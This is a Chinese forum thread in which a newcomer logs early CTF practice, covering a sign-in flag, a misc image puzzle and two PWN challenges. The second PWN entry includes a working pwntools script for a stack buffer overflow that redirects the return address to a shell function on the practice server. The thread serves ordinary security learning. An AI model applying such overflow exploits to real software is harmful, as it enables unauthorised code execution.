记录打CTF的路线

新人刚到工作岗位，发现这个叫CTF的有意思的东西。开个帖子记录一下自己打CTF的路，作为监督和鼓励自己的一个方法。
【不知道这个论坛是否允许记录帖，如果违反规定，就删掉吧，一定听从管理大佬的要求】


2020-5-12

旧平台注册账号成功。
（一边学习汇编和二进制，一边）尝试解决PWN类型（顺便能做点web或misc就顺手做）。

都做啊?

Bxb_R 发表于 2020-5-12 17:25
都做啊?

尽量呗~反正会做的也不多，多看WP复现呗

2020-5-13--------------
昨天签到题答上了，关注公众号然后发flag，系统就回复了
flag{BugKu-Sec-pwn!}


PWN第1题
只给了nc和IP:port，没有任何附件，只能先连上了
好像是个shell，输入pwd，回显了/，真的是shell
输入ls，回显有flag
输入cat flag，得到flag{6979d853add353c9}，提交成功。

from pwn import *
p=remote('114.116.54.89',10001)
p.interactive()

2020-5-13-------------
下午搭个win环境，顺便看看杂项
杂项【这是一张单纯的图片】
点击开就一张图，没有内容，习惯性抓包、F12，没直接看到啥有用的
用notepad++打开，最后看到一串unicode编码
转换过来发现flag只不过是key开头的
key{you are right}

我想问 楼主是在线学生嘛

Bxb_R 发表于 2020-5-14 09:27
我想问 楼主是在线学生嘛

是问在校学生吧？不是哦，已经是一条社畜了。

carl 发表于 2020-5-14 15:33
是问在校学生吧？不是哦，已经是一条社畜了。

那打CTF是兴趣还是

2020-5-14-------------
（开了一天会，真难受）
开始搞PWN2，盲猜没保护，直接IDAx64走起。
main函数里就有问题，声明了30长，结果读了100，一定有问题

然后观察函数列表，发现get_shell_函数，这个函数本身就调用了系统命令并运行了cat flag。

综上，只要发送payload让栈数据溢出、覆盖掉原来的返回地址，使得新地址跳到get_shell_函数即可
那么栈多长，返回地址在哪儿呢？
双击main函数里的&s参数，查看栈


很简单发现栈长30位，返回8位。同时再加上get_shell_的地址0x400751，完成payload编写
from pwn import *

work = remote("114.116.54.89",10003)
payload = 'Q' * (0x30+8) + p64(0x400751)
work.sendline(payload)
work.interactive()
最后运行得到flag{n0w_y0u_kn0w_the_Stack0verfl0w}


P.S.  网络不稳，网站响应慢，一度怀疑摸到EOF了，我感觉很淦！

Bxb_R 发表于 2020-5-14 15:56
那打CTF是兴趣还是

一半一半吧，老大让我练练PWN这类的。之前自己喜欢玩玩Misc，毕竟喜欢开脑洞